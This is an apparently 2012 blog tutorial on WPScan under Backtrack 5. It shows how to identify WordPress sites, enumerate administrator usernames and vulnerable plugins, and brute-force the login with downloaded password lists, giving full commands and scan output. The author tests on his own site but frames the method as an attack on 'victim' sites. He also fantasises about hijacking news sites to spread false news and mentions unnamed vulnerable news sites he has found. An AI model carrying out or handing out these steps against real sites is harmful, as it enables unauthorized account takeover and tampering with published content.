WordPress is a content management system used by billions of websites across the internet. It’s used to create news websites, blogs, social networks, company websites and just about everything else out there. Its become so popular that as of August 2011, 22% of the top 1 million visited websites on the internet are built on WordPress. This makes it a prime target for destruction on a global scale.
Imagine having access to several news websites on the web. Access to see news before its shared with the world and best of all access to change the news as you please. Its a massive power. Within minutes you could literally start a global war by posting false news on multiple websites and have that content delivered to billions of people instantly.
Through my investigations I have found several extremely popular news websites that are using WordPress as their foundation. I have also found that several of these sites contain potential vulnerabilities including bad passwords and exploits that can help somebody gain access to the entire server and lock out system administrators. For obvious reasons I’m not going to tell you what these sites are and what vulnerabilities they contain. Im not paid to secure sites for companies and corporations so its up to them to find the right man for the job.
Anyway moving on…
In this tutorial I’m going to show you how you can detect, scan and brute force attack WordPress sites to gain access to the CMS and potentially more. With a successful hack you can access and create post data, login credentials, subscriptions and just about anything else you can think of.
- Backtrack 5 R1
- Internet Connection
- Victim WordPress Site
- Password List
You can grab password lists through a google search. Alternatively you can head over to the Insanity Pop Download Center and grab a few different lists to aid the brute force attack.
Identifying WordPress Sites:
For obvious reasons we need to have a target identified. There is no point picking sites at random because for the most part there is a good chance they won’t be built on the WordPress CMS. To identify WordPress sites we can use our Hacking tool in Backtrack but sometimes this tool doesn’t pick up identifiers so its good practice to investigate the source code of the site we want to attack.
In the example below i’m showing you the Insanity Pop source code. You can view the source of any page from within your browser under the “view” or “development” menu’s. Alternativly there are online source viewers where you punch in the url and it shows you the source code of that specific page.
href="http://insanitypop.com/wp-content/themes/skeptical/style.css href="http://insanitypop.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 href="http://insanitypop.com/wp-content/plugins/social-toolbar/css/social_toolbar.css
Now that we have our site identified its time to run a scan to see can we find any usernames on the site. This seems to be a hit and miss process with some sites but its important that we run this scan anyway. If it does turn up any results then there is a good chance it will find an administrator username. To run a scan load up your Backtrack operating system. In this example I’m using Backtrack 5 R1.
Open up a new terminal and type the following to access the wpscan folder:
If we type “ls” we can see a list of files and folders within this folder. You should be able to see a file called wpscan.rb. This is our scanning application which will attack the website. With our directory correct in the terminal we can now type the following to load up the scanner and see its options (if your curious the tool is written in ruby, hence the .rb file extension).
You will now see the following printed on the terminal:
WordPress Security Scanner by ethicalhack3r.co.uk Sponsored by the RandomStorm Open Source Initiative _____________________________________________________ # Copyright (C) 2011 Ryan Dewhurst # This program comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under certain conditions. See GNU GPLv3. -h for further help. Examples: Do 'non-intrusive' checks... ruby ./wpscan.rb --url www.example.com Do wordlist password brute force on enumerated users using 50 threads... ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50 Do wordlist password brute force on the 'admin' username only... ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin Generate a new 'most popular' plugin list, up to 150 pages... ruby ./wpscan.rb --generate_plugin_list 150 Enumerate instaled plugins... ruby ./wpscan.rb --enumerate p See README for further information.
WPScan.rb gives us the following options that we can use within the application. In this tutorial we will be using “url, wordlist & username”:
- url The WordPress URL/domain to scan.
- version Only do version enumeration.
- wordlist Supply a wordlist for the password bruter and do the brute.
- threads The number of threads to use when multi-threading requests.
- username Only brute force the supplied username.
- generate_plugin_list Generate a new data/plugins.txt file.
- v Verbose output
Now lets perform a scan. We type the following to tell wpscan.rb to scan a url replacing the url with your desired victim.
./wpscan.rb --url http://www.insanitypop.com
WPScan will now scan the domain searching for the WordPress version and any potential exploits that are listed to attack that version of WordPress. In my case it showed the following”
# Copyright (C) 2011 Ryan Dewhurst # This program comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under certain conditions. See GNU GPLv3. | URL: http://www.insanitypop.com/ | Started on Tue Feb 7 00:56:21 2012 [+] The WordPress http://www.insanitypop.com/readme.html file exists. [+] Finished at Tue Feb 7 00:56:23 2012
With that finished we can now scan for usernames. We use the –enumerate code to tell it to search for “u” which is our username identifier script:
./wpscan.rb --url http://www.insanitypop.com --enumerate u
And the result: It’s its found my username as i am the administrator of the site. Please note that sometimes WPScan.rb can’t find usernames. If this is the case you will need to use social engineering or a username list file to try and brute force the login. I will show an example of the code to use for this under the heading “additional codes” at the end of this article.
# Copyright (C) 2011 Ryan Dewhurst # This program comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under certain conditions. See GNU GPLv3. | URL: http://www.insanitypop.com/ | Started on Tue Feb 7 00:59:33 2012 [+] The WordPress http://www.insanitypop.com/readme.html file exists. [+] Enumerating usernames... We found the following 1 username/s: rcanpolat [+] Finished at Tue Feb 7 00:59:46 2012
Now that we have a username its time to initiate a brute force attack and force our way into the login. WordPress can be modified using special plugins that don’t allow brute force attacks however there are billions of sites which are unaware of this including several major corporation and news websites (idiots).
To perform a brute force attack we will need a password list to read passwords from and attempt them on the site. You can download a passwords list from the Insanity Pop Download Center under “Codes & Scripts” by clicking this url (Registration Required): http://insanitypop.com/downloads/
After you download your password list throw it into the wpscan folder. You can navigate to this folder by going to places/computer/file system/pentest/web/wpscan through the Backtrack GUI. In this tutorial my password list is called “passwords.lst”.
Type the following to request WPScan.rb to attempt a brute force attack on the username rcanpolat using the passwords.lst password list file. This is a long process however in many cases it can result in a successful crack:
./wpscan.rb --url http://www.insanitypop.com --wordlist passwords.lst --username rcanpolat
We can use the code below to scan for plugins that contain vulnerabilities on the site:
./wpscan.rb --url http://www.insanitypop.com --enumerate p
We can use the following code to brute force a login using a username list file. This is a good place to start if WPScan.rb can’t find any usernames on the site:
./wpscan.rb --url www.example.com --wordlist passwords.lst --username usernames.lst
We can use multiple threads on a brute force attack using the following code:
./wpscan.rb --url www.example.com --wordlist passwords.lst --threads 50